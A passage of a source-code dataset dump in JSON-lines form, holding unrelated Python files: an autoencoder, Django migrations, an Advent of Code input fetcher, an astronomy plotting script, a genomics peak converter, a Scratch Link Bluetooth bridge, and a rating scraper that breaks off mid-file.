fea_num_x1 = 16*4\n fea_num_x2 = 32*4\n fea_num_x3 = 64*4\n fea_num_x4 = 128*4\n self.encoder = nn.Sequential(\n nn.Conv2d(self.chnum_in, fea_num_x1, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(fea_num_x1, fea_num_x2, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(fea_num_x2, fea_num_x3, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x3),\n nn.LeakyReLU(0.2, inplace=True),\n nn.Conv2d(fea_num_x3, fea_num_x4, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x4),\n nn.LeakyReLU(0.2, inplace=True)\n )\n self.decoder = nn.Sequential(\n nn.ConvTranspose2d(fea_num_x4, fea_num_x3, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x3),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(fea_num_x3, fea_num_x2, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x2),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(fea_num_x2, fea_num_x1, (4, 4), stride=2, padding=1),\n nn.BatchNorm2d(fea_num_x1),\n nn.LeakyReLU(0.2, inplace=True),\n nn.ConvTranspose2d(fea_num_x1, self.chnum_in, (4, 4), stride=2, padding=1),\n nn.Sigmoid()\n )\n def forward(self, x):\n f = self.encoder(x)\n output = self.decoder(f)\n return output","sub_path":"DCAE/dcae_conv2d.py","file_name":"dcae_conv2d.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"284077910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('frontend', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='customer',\n name='is_active',\n field=models.BooleanField(default=True, verbose_name='active'),\n ),\n migrations.AddField(\n model_name='customergroup',\n name='is_active',\n field=models.BooleanField(default=True, verbose_name='active'),\n ),\n ]\n","sub_path":"crm/frontend/migrations/0002_auto_20151110_0759.py","file_name":"0002_auto_20151110_0759.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"540890596","text":"import sys, os, requests, pickle, datetime\n\nAVAILABLE = datetime.datetime.today().day + 1\n\n# set up session cookie\ntoken = str()\nwith open('token', 'r') as f:\n token = f.read().strip()\n\nsession = requests.Session()\ncookies = {\"session\": token}\nbase_url = 
'https://adventofcode.com/2019/day/'\n\ndef day_x(day):\n return session.get(base_url + f'{day}/input', cookies=cookies).text\n\nif __name__ == \"__main__\":\n days = []\n if len(sys.argv) > 1:\n days = sys.argv[1:]\n else:\n days = [day for day in range(1, AVAILABLE)]\n\n for day in days: \n if isinstance(day, str):\n if not day.isdigit():\n continue\n day = int(day)\n if 0 < day < AVAILABLE:\n if os.path.exists(f\"{day}.in\"):\n continue\n input = day_x(day)\n with open(f\"{day}.in\", 'w') as f:\n f.write(input)\n else:\n print(f\"input for day {day} is not available yet...\")\n\n","sub_path":"input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"57713470","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0007_auto_20140820_1152'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='article',\n options={'ordering': ('-issue__order',), 'verbose_name': 'Yaz\\u0131', 'verbose_name_plural': 'Yaz\\u0131lar'},\n ),\n migrations.AlterModelOptions(\n name='editoraction',\n options={'ordering': ('-time',)},\n ),\n migrations.AlterModelOptions(\n name='photo',\n options={'verbose_name': 'Foto\\u011fraf', 'verbose_name_plural': 'Foto\\u011fraflar'},\n ),\n migrations.AlterModelOptions(\n name='userarticle',\n options={'verbose_name': 'okuyucu yaz\\u0131s\\u0131', 'verbose_name_plural': 'okuyucu yaz\\u0131lar\\u0131'},\n ),\n migrations.AddField(\n model_name='photo',\n name='photographer',\n field=models.ForeignKey(related_name=b'article_photos', blank=True, to='content.Author', null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"solfasol/content/migrations/0008_auto_20140821_1419.py","file_name":"0008_auto_20140821_1419.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"186542884","text":"################################################################################\n### Author: Tiago Castro, Pierluigi Monaco ###\n### ###\n################################################################################\nfrom astropy.io import fits\nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport numpy as np\nimport healpy as hp\nimport sys\nimport filenames\n\nif len(sys.argv)<2:\n print(\"Usage: python {} [my input file]\".format(sys.argv[0]))\n sys.exit(0)\ntry: \n input = __import__(sys.argv[1], globals(), locals(), [], 0)\nexcept ModuleNotFoundError:\n print(\"input file not found\")\n print(\"Usage: python {} [my input file]\".format(sys.argv[0]))\n sys.exit(0)\n\nprint(\"# Running plot_dndz.py with {}\".format(sys.argv[1]))\n\nif not input.PLOT:\n print(\"Plots are not required, exiting...\")\n sys.exit(0)\n\n# special behaviour\nlabd='lookup'\nlabs='complete'\nsecond_dndz_fname=None\n#second_dndz_fname=input.project+'NumberCounts/dndz_flagship_8614_BenSC8_m3_smL5_truez.fits'\nCHECK_WITH_RANDOM=True\nCOMPLETENESS=True\n\n# survey footprint in equatorial coordinate\nfootprint_res, footprint_zrange, sky_fraction, footprint = input.read_footprint()\nsky_coverage=input.sqdegonthesky * sky_fraction\nprint(\"This survey covers {} sq deg\".format(sky_coverage))\ndel footprint\n\nfname = filenames.dndz(input)\nprint(\"Reading dndz from file 
{}\".format(fname))\ndndz=fits.getdata(fname)\n\nfig=plt.figure(figsize=(8, 8))\nplt.suptitle(filenames.exclude_dir(fname))\n\ngs = gridspec.GridSpec(2, 1, height_ratios=[2.5, 1], hspace=0)\n\npanel1 = plt.subplot(gs[0])\npanel2 = plt.subplot(gs[1])\n\npanel1.set_xlim([footprint_zrange[0]-0.1,footprint_zrange[1]+0.1])\npanel2.set_xlim([footprint_zrange[0]-0.1,footprint_zrange[1]+0.1])\nif input.lf_model=='1':\n panel1.set_ylim([0, 1e4])\nelif input.lf_model=='3':\n panel1.set_ylim([0, 0.55e4])\npanel2.set_yscale('linear')\npanel2.set_ylim([0.85,1.15])\npanel2.set_xlabel(r'redshift')\npanel1.set_ylabel(r'$dn/dz$, deg$^{-2}$ $(\\Delta z)^{-1}$')\npanel2.set_ylabel(r'residuals vs model')\n#uuu=panel1.set_xticklabels('',visible=False)\nplt.tight_layout(pad=1.5)\n\n# redshift binning for computing dn/dz\nztab = np.append(dndz['z_lower'],dndz['z_upper'][-1])\n\nNmodel=[]\nfor z1,z2 in zip(ztab[:-1],ztab[1:]):\n if z1<0.1:\n Nmodel.append(0.)\n else:\n Nmodel.append(input.Pozzetti_dndz(z1,z2)/input.deltazbin)\nNmodel=np.asarray(Nmodel)\npos=Nmodel>0\npanel1.plot(dndz['z_center'],Nmodel,label='model',c='k')\npanel2.plot(dndz['z_center'],np.ones_like(Nmodel),c='k')\n\npanel1.plot(dndz['z_center'],dndz['N_gal']/sky_coverage/input.deltazbin,label=labd,c='red')\npanel2.plot(dndz['z_center'][pos],dndz['N_gal'][pos]/sky_coverage/input.deltazbin/Nmodel[pos],c='red')\npanel1.plot(dndz['z_center'],dndz['N_gal_gaus']/sky_coverage/input.deltazbin,label='smoothed '+labd,c='orange')\npanel2.plot(dndz['z_center'][pos],dndz['N_gal_gaus'][pos]/sky_coverage/input.deltazbin/Nmodel[pos],c='orange')\n\npanel1.plot(dndz['z_center'],dndz['N_cen']/sky_coverage/input.deltazbin,'--',label=labd+', centrals',c='red')\npanel1.plot(dndz['z_center'],(dndz['N_gal']-dndz['N_cen'])/sky_coverage/input.deltazbin,':',label=labd+', satellites',c='red')\n\n\nif second_dndz_fname is not None:\n print(\"Reading second dndz from file {}\".format(second_dndz_fname))\n dndz2 = fits.getdata(second_dndz_fname)\n panel1.plot(dndz2['z_center'],dndz2['N_gal']/sky_coverage/input.deltazbin,label=labs,c='b')\n panel1.plot(dndz2['z_center'],dndz2['N_cen']/sky_coverage/input.deltazbin,'--',label=labs+', centrals',c='b')\n panel1.plot(dndz2['z_center'],(dndz2['N_gal']-dndz2['N_cen'])/sky_coverage/input.deltazbin,':',label=labs+', satellites',c='b')\n panel2.plot(dndz2['z_center'][pos],dndz2['N_gal'][pos]/sky_coverage/input.deltazbin/Nmodel[pos],c='b')\n\n\nif CHECK_WITH_RANDOM:\n print(\"Reading random catalog {}...\".format(filenames.random(input)))\n random = fits.getdata(filenames.random(input))\n\n Ng=np.histogram(random[input.redshift_key], bins=ztab)[0]/sky_coverage/input.deltazbin/input.alpha\n panel1.plot(dndz['z_center'],Ng,'-.',label='from random',c='cyan')\n panel2.plot(dndz['z_center'][pos],Ng[pos]/Nmodel[pos],'-.',c='cyan')\n\n if (not input.apply_dataselection_to_random) & (input.selection_random_tag is not None):\n print(\"Reading random selection {}...\".format(filenames.selection_random(input))) \n sel = fits.getdata(filenames.selection_random(input))['SELECTION']\n Ng=np.histogram(random[input.redshift_key][sel], bins=ztab)[0]/sky_coverage/input.deltazbin/input.alpha\n panel1.plot(dndz['z_center'],Ng,'-.',label='random with selection',c='yellow')\n panel2.plot(dndz['z_center'][pos],Ng[pos]/Nmodel[pos],'-.',c='yellow')\n \n\n\n\npanel1.legend()\n\nif input.SHOW:\n plt.show()\n\nplt.savefig(filenames.plot_dndz(input))\nprint(\"## written image in file {}\".format(filenames.plot_dndz(input)))\n\nif COMPLETENESS and second_dndz_fname is 
not None:\n\n plt.figure()\n plt.plot(dndz['z_center'],dndz['N_gal']/dndz2['N_gal'])\n plt.xlabel('redshift')\n plt.ylabel('completeness')\n plt.ylim([0,1.1])\n plt.plot(dndz['z_center'],np.ones_like(dndz['z_center']),c='k')\n plt.show()\n","sub_path":"Pipeline/plot_dndz.py","file_name":"plot_dndz.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"486906169","text":"#!/users/eprakash/anaconda2/bin/python\n\nimport sys\nimport re\nfrom collections import OrderedDict\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"regionSize\", type=int,\n help=\"Size of region in base pairs e.g. 400\")\nargs = parser.parse_args()\nregionSize = args.regionSize\n#print(\"regionSize is \" + str(regionSize))\n\n\nfor line in sys.stdin:\n\tmatch = re.match(\"(\\S+)\\s+(\\d+)\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+\\S+\\s+(\\d+)\\s*$\", line)\n\tif match:\n\t\tchrom = match.group(1)\t\n\t\tchromStart = int(match.group(2))\n\t\tchromSummitOffset = int(match.group(3))\n\t\tregionStart = chromStart + chromSummitOffset - int(regionSize/2)\n\t\tregionEnd = regionStart + regionSize\n\t\tprint(\"\" + chrom + \"\\t\" + str(regionStart) + \"\\t\" + str(regionEnd))\n","sub_path":"evautils/narrowpeaks_to_bed.py","file_name":"narrowpeaks_to_bed.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501539819","text":"#!/usr/bin/env python\nimport select\nimport struct\n\n\"\"\"Scratch link on bluepy\"\"\"\n\nimport asyncio\nimport pathlib\nimport ssl\nimport websockets\nimport json\nimport base64\nimport logging\nimport sys\nimport signal\nimport traceback\n\n# for Bluetooth (e.g. Lego EV3)\nimport bluetooth\n\n# for BLESession (e.g. 
BBC micro:bit)\nfrom bluepy.btle import Scanner, UUID, Peripheral, DefaultDelegate\nfrom bluepy.btle import BTLEDisconnectError, BTLEManagementError\n\nimport threading\nimport time\nimport queue\n\nlogLevel = logging.INFO\n\n# handle command line options\nif __name__ == \"__main__\":\n opts = [opt for opt in sys.argv[1:] if opt.startswith(\"-\")]\n if \"-h\" in opts:\n print((f\"Usage: {sys.argv[0]} [OPTS]\\n\"\n \"OPTS:\\t-h Show this help.\\n\"\n \"\\t-d Print debug messages.\"\n ))\n sys.exit(1)\n elif \"-d\" in opts:\n print(\"Print debug messages\")\n logLevel = logging.DEBUG\n\n# for logging\nlogger = logging.getLogger(__name__)\nhandler = logging.StreamHandler()\nhandler.setLevel(logLevel)\nlogger.setLevel(logLevel)\nlogger.addHandler(handler)\nlogger.propagate = False\n\nclass Session():\n \"\"\"Base class for BTSession and BLESession\"\"\"\n def __init__(self, websocket, loop):\n self.websocket = websocket\n self.loop = loop\n self.lock = threading.RLock()\n self.notification_queue = queue.Queue()\n\n async def recv_request(self):\n \"\"\"\n Handle a request from Scratch through the websocket.\n Return True when the session should end.\n \"\"\"\n logger.debug(\"start recv_request\")\n try:\n req = await asyncio.wait_for(self.websocket.recv(), 0.0001)\n except asyncio.TimeoutError:\n return False\n logger.debug(f\"request: {req}\")\n jsonreq = json.loads(req)\n if jsonreq['jsonrpc'] != '2.0':\n logger.error(\"error: jsonrpc version is not 2.0\")\n return True\n jsonres = self.handle_request(jsonreq['method'], jsonreq['params'])\n if 'id' in jsonreq:\n jsonres['id'] = jsonreq['id']\n response = json.dumps(jsonres)\n logger.debug(f\"response: {response}\")\n await self.websocket.send(response)\n if self.end_request():\n return True\n return False\n\n def handle_request(self, method, params):\n \"\"\"Default request handler\"\"\"\n logger.debug(f\"default handle_request: {method}, {params}\")\n\n def end_request(self):\n \"\"\"\n Default callback at request end. 
This callback is required to\n allow other websocket usage out of the request handler.\n Return true when the session should end.\n \"\"\"\n logger.debug(\"default end_request\")\n return False\n\n def notify(self, key, params):\n self.notification_queue.put((key, params))\n\n async def _send_notifications(self):\n \"\"\"\n Notify BT/BLE device events to scratch.\n \"\"\"\n logger.debug(\"start to notify\")\n # flush notification queue\n while not self.notification_queue.empty():\n method, params = self.notification_queue.get()\n await self._send_notification(method, params)\n\n async def _send_notification(self, method, params):\n jsonn = { 'jsonrpc': \"2.0\", 'method': method }\n jsonn['params'] = params\n notification = json.dumps(jsonn)\n logger.debug(f\"notification: {notification}\")\n await self.websocket.send(notification)\n\n async def handle(self):\n logger.debug(\"start session hanlder\")\n await self.recv_request()\n await asyncio.sleep(0.1)\n while True:\n if await self.recv_request():\n break\n await self._send_notifications()\n logger.debug(\"in handle loop\")\n\nclass BTSession(Session):\n \"\"\"Manage a session for Bluetooth device\"\"\"\n\n INITIAL = 1\n DISCOVERY = 2\n DISCOVERY_COMPLETE = 3\n CONNECTED = 4\n DONE = 5\n\n # Split this into discovery thread and communication thread\n # discovery thread should auto-terminate\n\n class BTThread(threading.Thread):\n \"\"\"\n Separated thread to control notifications to Scratch.\n It handles device discovery notification in DISCOVERY status\n and notifications from bluetooth devices in CONNECTED status.\n \"\"\"\n\n class BTDiscoverer(bluetooth.DeviceDiscoverer):\n\n def __init__(self, major_class, minor_class):\n super().__init__()\n self.major_class = major_class\n self.minor_class = minor_class\n self.found_devices = {}\n self.done = False\n\n def pre_inquiry(self):\n self.done = False\n\n def device_discovered(self, address, device_class, rssi, name):\n logger.debug(f\"Found device {name} addr={address} class={device_class} rssi={rssi}\")\n major_class = (device_class & 0x1F00) >> 8\n minor_class = (device_class & 0xFF) >> 2\n if major_class == self.major_class and minor_class == self.minor_class:\n self.found_devices[address] = (name, device_class, rssi)\n\n def inquiry_complete(self):\n self.done = True\n\n def __init__(self, session, major_device_class, minor_device_class):\n threading.Thread.__init__(self)\n self.session = session\n self.major_device_class = major_device_class\n self.minor_device_class = minor_device_class\n self.cancel_discovery = False\n self.ping_time = None\n\n def discover(self):\n discoverer = self.BTDiscoverer(self.major_device_class, self.minor_device_class)\n discoverer.find_devices(lookup_names=True)\n while self.session.status == self.session.DISCOVERY and not discoverer.done and not self.cancel_discovery:\n readable = select.select([discoverer], [], [], 0.5)[0]\n if discoverer in readable:\n discoverer.process_event()\n for addr, (device_name, device_class, rssi) in discoverer.found_devices.items():\n logger.debug(f\"notifying discovered {addr}: {device_name}\")\n params = {\"rssi\": rssi, 'peripheralId': addr, 'name': device_name.decode(\"utf-8\")}\n self.session.notify('didDiscoverPeripheral', params)\n discoverer.found_devices.clear()\n\n if not discoverer.done:\n discoverer.cancel_inquiry()\n\n def run(self):\n while self.session.status != self.session.DONE:\n\n logger.debug(\"loop in BT thread\")\n current_time = int(round(time.time()))\n\n if self.session.status == 
self.session.DISCOVERY and not self.cancel_discovery:\n logger.debug(\"in discovery status:\")\n try:\n self.discover()\n self.ping_time = current_time + 5\n finally:\n self.session.status = self.session.DISCOVERY_COMPLETE\n\n elif self.session.status == self.session.CONNECTED:\n logger.debug(\"in connected status:\")\n sock = self.session.sock\n try:\n ready = select.select([sock], [], [], 1)\n if ready[0]:\n header = sock.recv(2)\n [msg_len] = struct.unpack(\" 0:\n logger.debug(params)\n\n res = { \"jsonrpc\": \"2.0\" }\n\n if self.status == self.INITIAL and method == 'discover':\n logger.debug(\"Starting async discovery\")\n self.status = self.DISCOVERY\n self.bt_thread = self.BTThread(self, params[\"majorDeviceClass\"], params[\"minorDeviceClass\"])\n self.bt_thread.start()\n res[\"result\"] = None\n\n elif self.status in [self.DISCOVERY, self.DISCOVERY_COMPLETE] and method == 'connect':\n\n # Cancel discovery\n while self.status == self.DISCOVERY:\n logger.debug(\"Cancelling discovery\")\n self.bt_thread.cancel_discovery = True\n time.sleep(1)\n\n addr = params['peripheralId']\n logger.debug(f\"connecting to the BT device {addr}\")\n try:\n self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n self.sock.connect((addr, 1))\n logger.info(f\"connected to BT device: {addr}\")\n except bluetooth.BluetoothError as e:\n logger.error(f\"failed to connect to BT device: {e}\", exc_info=e)\n self.status = self.DONE\n self.sock = None\n\n if self.sock:\n res[\"result\"] = None\n self.status = self.CONNECTED\n else:\n err_msg = f\"BT connect failed: {addr}\"\n res[\"error\"] = { \"message\": err_msg }\n self.status = self.DONE\n\n elif self.status == self.CONNECTED and method == 'send':\n logger.debug(\"handle send request\")\n if params['encoding'] != 'base64':\n logger.error(\"encoding other than base 64 is not \"\n \"yet supported: \", params['encoding'])\n msg_bstr = params['message'].encode('ascii')\n data = base64.standard_b64decode(msg_bstr)\n self.sock.send(data)\n res['result'] = len(data)\n\n logger.debug(res)\n return res\n\n def end_request(self):\n logger.debug(f\"end_request of BTSession {self}\")\n return self.status == self.DONE\n\n\nclass BLESession(Session):\n \"\"\"\n Manage a session for Bluetooth Low Energy device such as micro:bit\n \"\"\"\n\n INITIAL = 1\n DISCOVERY = 2\n CONNECTED = 3\n DONE = 4\n\n SERVICE_CLASS_UUID_ADTYPES = {\n 0x7: \"adtype complete 128b\",\n 0x3: \"adtype complete 16b\",\n 0x6: \"adtype incomplete 128b\",\n 0x5: \"adtype complete 32b\",\n 0x4: \"adtype incomplete 32b\",\n 0x2: \"adtype incomplete 16b\",\n }\n\n class BLEThread(threading.Thread):\n \"\"\"\n Separated thread to control notifications to Scratch.\n It handles device discovery notification in DISCOVERY status\n and notifications from BLE devices in CONNECTED status.\n \"\"\"\n def __init__(self, session):\n threading.Thread.__init__(self)\n self.session = session\n\n def run(self):\n while True:\n logger.debug(\"loop in BLE thread\")\n if self.session.status == self.session.DISCOVERY:\n logger.debug(\"send out found devices\")\n devices = self.session.found_devices\n for d in devices:\n params = { 'rssi': d.rssi }\n params['peripheralId'] = devices.index(d)\n params['name'] = d.getValueText(0x9)\n self.session.notify('didDiscoverPeripheral', params)\n time.sleep(1)\n elif self.session.status == self.session.CONNECTED:\n logger.debug(\"in connected status:\")\n delegate = self.session.delegate\n if delegate and len(delegate.handles) > 0:\n if not 
delegate.restart_notification_event.is_set():\n delegate.restart_notification_event.wait()\n try:\n logger.debug(\"getting lock for waitForNotification\")\n with self.session.lock:\n logger.debug(\"before waitForNotification\")\n self.session.perip.waitForNotifications(0.0001)\n logger.debug(\"after waitForNotification\")\n logger.debug(\"released lock for waitForNotification\")\n except Exception as e:\n logger.error(e)\n self.session.close()\n break\n else:\n time.sleep(0.0)\n # To avoid repeated lock by this single thread,\n # yield CPU to other lock waiting threads.\n time.sleep(0)\n else:\n # Nothing to do:\n time.sleep(0)\n\n class BLEDelegate(DefaultDelegate):\n \"\"\"\n A bluepy handler to receive notifications from BLE devices.\n \"\"\"\n def __init__(self, session):\n DefaultDelegate.__init__(self)\n self.session = session\n self.handles = {}\n self.restart_notification_event = threading.Event()\n self.restart_notification_event.set()\n\n def add_handle(self, serviceId, charId, handle):\n logger.debug(f\"add handle for notification: {handle}\")\n params = { 'serviceId': UUID(serviceId).getCommonName(),\n 'characteristicId': charId,\n 'encoding': 'base64' }\n self.handles[handle] = params\n\n def handleNotification(self, handle, data):\n logger.debug(f\"BLE notification: {handle} {data}\")\n params = self.handles[handle].copy()\n params['message'] = base64.standard_b64encode(data).decode('ascii')\n self.session.notify('characteristicDidChange', params)\n\n def __init__(self, websocket, loop):\n super().__init__(websocket, loop)\n self.status = self.INITIAL\n self.found_devices = []\n self.device = None\n self.perip = None\n self.delegate = None\n\n def close(self):\n self.status = self.DONE\n if self.perip:\n logger.info(f\"disconnect from BLE peripheral: {self.perip}\")\n self.perip.disconnect()\n\n def __del__(self):\n self.close()\n\n def _get_dev_uuid(self, dev):\n for adtype in self.SERVICE_CLASS_UUID_ADTYPES:\n service_class_uuid = dev.getValueText(adtype)\n if service_class_uuid:\n logger.debug(self.SERVICE_CLASS_UUID_ADTYPES[adtype])\n return UUID(service_class_uuid)\n return None\n\n def matches(self, dev, filters):\n \"\"\"\n Check if the found BLE device matches the filters Scratch specifies.\n \"\"\"\n logger.debug(f\"in matches {dev} {filters}\")\n for f in filters:\n if 'services' in f:\n for s in f['services']:\n logger.debug(f\"service to check: {s}\")\n given_uuid = s\n logger.debug(f\"given: {given_uuid}\")\n dev_uuid = self._get_dev_uuid(dev)\n if not dev_uuid:\n continue\n logger.debug(f\"dev: {dev_uuid}\")\n logger.debug(given_uuid == dev_uuid)\n if given_uuid == dev_uuid:\n logger.debug(\"match...\")\n return True\n if 'name' in f or 'manufactureData' in f:\n logger.error(\"name/manufactureData filters not implemented\")\n # TODO: implement other filters defined:\n # ref: https://github.com/LLK/scratch-link/blob/develop/Documentation/BluetoothLE.md\n return False\n\n def _get_service(self, service_id):\n with self.lock:\n service = self.perip.getServiceByUUID(UUID(service_id))\n return service\n\n def _get_characteristic(self, chara_id):\n if not self.perip:\n return None\n with self.lock:\n charas = self.perip.getCharacteristics(uuid=chara_id)\n return charas[0]\n\n def handle_request(self, method, params):\n \"\"\"Handle requests from Scratch\"\"\"\n if self.delegate:\n # Do not allow notification during request handling to avoid\n # websocket server errors\n self.delegate.restart_notification_event.clear()\n\n logger.debug(\"handle request to BLE device\")\n 
logger.debug(method)\n if len(params) > 0:\n logger.debug(params)\n\n res = { \"jsonrpc\": \"2.0\" }\n err_msg = None\n\n if self.status == self.INITIAL and method == 'discover':\n scanner = Scanner()\n try:\n devices = scanner.scan(1.0)\n for dev in devices:\n if self.matches(dev, params['filters']):\n self.found_devices.append(dev)\n except BTLEManagementError as e:\n logger.error(e)\n err_msg = \"Can not scan BLE devices. Check BLE controller.\"\n logger.error(err_msg)\n res[\"error\"] = { \"message\": err_msg }\n self.status = self.DONE\n\n if len(self.found_devices) == 0 and not err_msg:\n err_msg = (f\"BLE service not found: {params['filters']}. \"\n \"Check BLE device.\")\n res[\"error\"] = { \"message\": err_msg }\n logger.error(err_msg)\n self.status = self.DONE\n else:\n res[\"result\"] = None\n self.status = self.DISCOVERY\n self.ble_thread = self.BLEThread(self)\n self.ble_thread.start()\n\n elif self.status == self.DISCOVERY and method == 'connect':\n logger.debug(\"connecting to the BLE device\")\n self.device = self.found_devices[params['peripheralId']]\n try:\n self.perip = Peripheral(self.device.addr,\n self.device.addrType)\n logger.info(f\"connect to BLE peripheral: {self.perip}\")\n except BTLEDisconnectError as e:\n logger.error(f\"failed to connect to BLE device: {e}\")\n self.status = self.DONE\n\n if self.perip:\n res[\"result\"] = None\n self.status = self.CONNECTED\n self.delegate = self.BLEDelegate(self)\n self.perip.withDelegate(self.delegate)\n else:\n err_msg = f\"BLE connect failed: {self.device}\"\n res[\"error\"] = { \"message\": err_msg }\n self.status = self.DONE\n\n elif self.status == self.CONNECTED and method == 'read':\n logger.debug(\"handle read request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n c = self._get_characteristic(chara_id)\n if not c or c.uuid != UUID(chara_id):\n logger.error(f\"Failed to get characteristic {chara_id}\")\n self.status = self.DONE\n else:\n with self.lock:\n b = c.read()\n message = base64.standard_b64encode(b).decode('ascii')\n res['result'] = { 'message': message, 'encode': 'base64' }\n if params.get('startNotifications'):\n self.startNotifications(service_id, chara_id)\n\n elif self.status == self.CONNECTED and method == 'startNotifications':\n logger.debug(\"handle startNotifications request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n self.startNotifications(service_id, chara_id)\n\n elif self.status == self.CONNECTED and method == 'stopNotifications':\n logger.debug(\"handle stopNotifications request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n self.stopNotifications(service_id, chara_id)\n\n elif self.status == self.CONNECTED and method == 'write':\n logger.debug(\"handle write request\")\n service_id = params['serviceId']\n chara_id = params['characteristicId']\n c = self._get_characteristic(chara_id)\n if not c or c.uuid != UUID(chara_id):\n logger.error(f\"Failed to get characteristic {chara_id}\")\n self.status = self.DONE\n else:\n if params['encoding'] != 'base64':\n logger.error(\"encoding other than base 64 is not \"\n \"yet supported: \", params['encoding'])\n msg_bstr = params['message'].encode('ascii')\n data = base64.standard_b64decode(msg_bstr)\n logger.debug(\"getting lock for c.write()\")\n with self.lock:\n c.write(data)\n logger.debug(\"released lock for c.write()\")\n res['result'] = len(data)\n\n logger.debug(res)\n return res\n\n def setNotifications(self, service_id, chara_id, 
value):\n service = self._get_service(service_id)\n c = self._get_characteristic(chara_id)\n handle = c.getHandle()\n # prepare notification handler\n self.delegate.add_handle(service_id, chara_id, handle)\n # request notification to the BLE device\n with self.lock:\n self.perip.writeCharacteristic(handle + 1, value, True)\n\n def startNotifications(self, service_id, chara_id):\n logger.debug(f\"start notification for {chara_id}\")\n self.setNotifications(service_id, chara_id, b\"\\x01\\x00\")\n\n def stopNotifications(self, service_id, chara_id):\n logger.debug(f\"stop notification for {chara_id}\")\n self.setNotifications(service_id, chara_id, b\"\\x00\\x00\")\n\n def end_request(self):\n logger.debug(\"end_request of BLESession\")\n if self.delegate:\n self.delegate.restart_notification_event.set()\n return self.status == self.DONE\n\n# kick start WSS server\nssl_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)\nlocalhost_cer = pathlib.Path(__file__).with_name(\"scratch-device-manager.cer\")\nlocalhost_key = pathlib.Path(__file__).with_name(\"scratch-device-manager.key\")\nssl_context.load_cert_chain(localhost_cer, localhost_key)\nsessionTypes = { '/scratch/ble': BLESession, '/scratch/bt': BTSession }\n\nasync def ws_handler(websocket, path):\n try:\n logger.info(f\"Start session for web socket path: {path}\")\n loop = asyncio.get_event_loop()\n session = sessionTypes[path](websocket, loop)\n await session.handle()\n except Exception as e:\n logger.error(f\"Failure in session for web socket path: {path}\")\n logger.error(e)\n\nstart_server = websockets.serve(\n ws_handler, \"device-manager.scratch.mit.edu\", 20110, ssl=ssl_context\n)\n\ndef stack_trace():\n print(\"in stack_trace\")\n code = []\n for threadId, stack in sys._current_frames().items():\n code.append(\"\\n# ThreadID: %s\" % threadId)\n for filename, lineno, name, line in traceback.extract_stack(stack):\n code.append('File: \"%s\", line %d, in %s' % (filename,\n lineno, name))\n if line:\n code.append(\" %s\" % (line.strip()))\n\n for line in code:\n print(line)\n\nwhile True:\n try:\n asyncio.get_event_loop().run_until_complete(start_server)\n logger.info(\"Started scratch-link\")\n asyncio.get_event_loop().run_forever()\n except KeyboardInterrupt as e:\n stack_trace()\n break\n except Exception as e:\n logger.info(\"Restarting scratch-link...\")\n\n","sub_path":"scratch_link.py","file_name":"scratch_link.py","file_ext":"py","file_size_in_byte":25222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"591304886","text":"import requests\nimport pandas as pd\nimport os\n\nfor i in range(1, 173204):\n pageUrl = 'http://rating.chgk.info/api/players/'+str(i)+'/rating/'\n r = requests.get(pageUrl)\n\n with open('E:\\\\test4.xml', 'w') as output_file:\n output_file.write(r.text)\n\n lines = []\n with open('E:\\\\test4.xml', 'r+') as f:\n lines = f.readlines()\n\n IDPlayerList = []\n IDReleaseList = []\n ratingList = []\n ratingPositionList = []\n dateList = []\n champInYearList = []\n champsTotalList = []\n\n for line in lines:\n if(line.startswith(' \"idplayer\": \"')):\n print(line[len(' \"idplayer\": \"'):-3])\n IDPlayerList.append(line[len(' \"idplayer\": \"'):-3])\n continue\n if(line.startswith(' \"idrelease\": \"')):\n print(line[len(' \"idrelease\": \"'):-3])\n IDReleaseList.append(line[len(' \"idrelease\": \"'):-3])\n continue\n if(line.startswith(' \"rating\": \"')):\n print(line[len(' \"rating\": \"'):-3])\n ratingList.append(line[len(' \"rating\": \"'):-3])\n 
